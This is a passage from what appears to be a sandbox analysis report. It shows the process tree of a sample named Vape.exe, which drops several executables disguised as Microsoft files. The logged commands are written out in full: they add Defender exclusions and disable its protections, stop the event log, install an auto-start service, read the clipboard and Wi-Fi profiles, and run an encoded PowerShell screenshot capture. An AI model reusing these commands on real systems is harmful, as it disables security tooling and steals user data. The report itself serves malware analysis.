"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.30.108441281\860084976" -childID 27 -isForBrowser -prefsHandle 7776 -prefMapHandle 6040 -prefsLen 31406 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ce87fa47-3bda-48fc-993c-636495b327df} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 7532 131286c9258 tab
4⤵
PID:468

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.31.905363151\1983676262" -childID 28 -isForBrowser -prefsHandle 7488 -prefMapHandle 7496 -prefsLen 31406 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7adb0baf-d0fb-434a-9fa4-97f5e16ee662} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 7480 131290d9d58 tab
4⤵
PID:596

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.32.136033856\538615017" -childID 29 -isForBrowser -prefsHandle 7372 -prefMapHandle 7404 -prefsLen 31406 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7c711d0d-a64d-44ff-b023-64ca6fdcc3c0} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 7400 131290dac58 tab
4⤵
PID:6636

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.33.1281204335\1836476836" -childID 30 -isForBrowser -prefsHandle 4848 -prefMapHandle 8552 -prefsLen 31406 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {070d67fa-1093-40f8-8bb6-9376585b6170} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 8604 13126493258 tab
4⤵
PID:6528

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.34.1323141387\2138896471" -childID 31 -isForBrowser -prefsHandle 10180 -prefMapHandle 2888 -prefsLen 31406 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fce22b6c-ac6f-4344-a455-a7470e6df9bc} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 8976 13126490b58 tab
4⤵
PID:1636

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.35.1610080577\1069589256" -childID 32 -isForBrowser -prefsHandle 7564 -prefMapHandle 7292 -prefsLen 31415 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {693d874e-afab-4c2b-a936-84839b60aec6} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 7484 1312cbe8258 tab
4⤵
PID:5804

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.36.1641074331\1774633407" -childID 33 -isForBrowser -prefsHandle 7676 -prefMapHandle 6516 -prefsLen 31415 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48771972-9862-443f-9351-02c8c43e2d52} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 5684 13126d3b258 tab
4⤵
PID:2280

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.37.1258645661\496237377" -childID 34 -isForBrowser -prefsHandle 5832 -prefMapHandle 3820 -prefsLen 31415 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8fc82e4a-a5b2-447a-b0c6-1b6ae982a0c9} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 9608 1312d014d58 tab
4⤵
PID:1600

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1952.38.274132915\579241069" -childID 35 -isForBrowser -prefsHandle 7708 -prefMapHandle 8940 -prefsLen 31415 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8e9864d-8607-4ef6-8884-e3144308ca89} 1952 "\\.\pipe\gecko-crash-server-pipe.1952" 7040 13125f0dc58 tab
4⤵
PID:6424

C:\Users\Admin\Desktop\Vape.exe
"C:\Users\Admin\Desktop\Vape.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5972

C:\Users\Admin\AppData\Local\Temp\Microsoft_Protection.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft_Protection.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:5504

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Webdriversession\gI2DkJwTD.vbe"
4⤵
- Checks computer location settings
PID:4252

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Webdriversession\SoPkc.bat" "
5⤵
PID:6564

C:\Webdriversession\Intoref.exe
"C:\Webdriversession\Intoref.exe"
6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3180

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TA6rIcr2dS.bat"
7⤵
PID:212

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:3936

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
8⤵
PID:4260

C:\Recovery\WindowsRE\smss.exe
"C:\Recovery\WindowsRE\smss.exe"
8⤵
PID:5688

C:\Users\Admin\AppData\Local\Temp\Microsoft_crypt.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft_crypt.exe"
3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:6892

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
4⤵
PID:2100

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
5⤵
PID:7016

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
4⤵
PID:6464

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
4⤵
PID:2808

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
4⤵
PID:1612

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
4⤵
PID:6104

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2252

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "QHRAJGDI"
4⤵
- Launches sc.exe
PID:1452

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "QHRAJGDI" binpath= "C:\ProgramData\nalfdgwigwyg\lhhsgwktkatl.exe" start= "auto"
4⤵
- Launches sc.exe
PID:456

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
4⤵
- Launches sc.exe
PID:344

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "QHRAJGDI"
4⤵
- Launches sc.exe
PID:4120

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:6484

C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe"
3⤵
- Executes dropped EXE
PID:5044

C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe'"
5⤵
PID:4228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
5⤵
PID:540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
5⤵
PID:6256

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
5⤵
PID:6396

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
5⤵
PID:4584

C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
6⤵
PID:1772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
5⤵
PID:3708

C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
6⤵
PID:2432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
5⤵
PID:2144

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
6⤵
- Detects videocard installed
PID:1916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
5⤵
PID:4704

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
6⤵
- Detects videocard installed
PID:2680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
5⤵
PID:2196

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
6⤵
- Enumerates processes with tasklist
PID:3004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
5⤵
PID:396

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
6⤵
- Enumerates processes with tasklist
PID:5032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
5⤵
PID:5592

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
6⤵
PID:4440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
5⤵
PID:4568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:4500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
5⤵
PID:5440

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:2208

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
6⤵
- Enumerates processes with tasklist
PID:3264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
5⤵
PID:3524

C:\Windows\system32\tree.com
tree /A /F
6⤵
PID:6452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
5⤵
PID:5224

C:\Windows\system32\netsh.exe
netsh wlan show profile
6⤵
PID:6860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
5⤵
PID:3364

C:\Windows\system32\systeminfo.exe
systeminfo
6⤵
- Gathers system information
PID:2400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
5⤵
PID:6588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3572

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gs0wgajg\gs0wgajg.cmdline"
7⤵
PID:5376

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DB3.tmp" "c:\Users\Admin\AppData\Local\Temp\gs0wgajg\CSC6283C7176BD4FB59480E4973D5E0ED.TMP"
8⤵
PID:2572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
5⤵
PID:3612

C:\Windows\system32\tree.com
tree /A /F
6⤵
PID:4548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
5⤵
PID:5316

C:\Windows\system32\tree.com
tree /A /F
6⤵
PID:5364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
5⤵
PID:5420

C:\Windows\system32\tree.com
tree /A /F
6⤵
PID:5528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
5⤵
PID:1560

C:\Windows\system32\tree.com
tree /A /F
6⤵
PID:1576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
5⤵
PID:1696

C:\Windows\system32\tree.com
tree /A /F
6⤵
PID:5644

C:\Windows\system32\cmd.exe
